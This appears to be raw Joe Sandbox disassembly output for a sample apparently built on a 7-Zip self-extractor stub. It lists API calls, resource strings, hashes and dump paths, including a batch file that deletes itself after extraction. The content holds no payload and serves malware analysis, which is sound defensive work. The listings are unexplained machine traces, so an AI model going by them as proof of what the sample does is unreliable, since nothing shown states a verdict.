                                                                • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                APIs
                                                                • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                APIs
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                • _wtol.MSVCRT ref: 004034E5
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                • _wtol.MSVCRT ref: 0040367F
                                                                • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                • String ID: .lnk
                                                                • API String ID: 408529070-24824748
                                                                • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                • wsprintfW.USER32 ref: 00401FFD
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                • GetLastError.KERNEL32 ref: 00402017
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                • GetLastError.KERNEL32 ref: 0040204C
                                                                • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                • _wtol.MSVCRT ref: 0040212A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                • String ID: 7zSfxString%d$XpA$\3A
                                                                • API String ID: 2117570002-3108448011
                                                                • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                • wsprintfW.USER32 ref: 00401C95
                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                • API String ID: 2639302590-365843014
                                                                • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                APIs
                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                • String ID:
                                                                • API String ID: 829399097-0
                                                                • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                • String ID:
                                                                • API String ID: 1862581289-0
                                                                • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$AddressLibraryLoadProc
                                                                • String ID: SetWindowTheme$\EA$uxtheme
                                                                • API String ID: 324724604-1613512829
                                                                • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                APIs
                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                • API String ID: 3007203151-3467708659
                                                                • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                • _wtol.MSVCRT ref: 004047DC
                                                                • _wtol.MSVCRT ref: 004047F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                • API String ID: 2725485552-3187639848
                                                                • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                • GetParent.USER32(?), ref: 00402E2E
                                                                • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                • GetMenu.USER32(?), ref: 00402E55
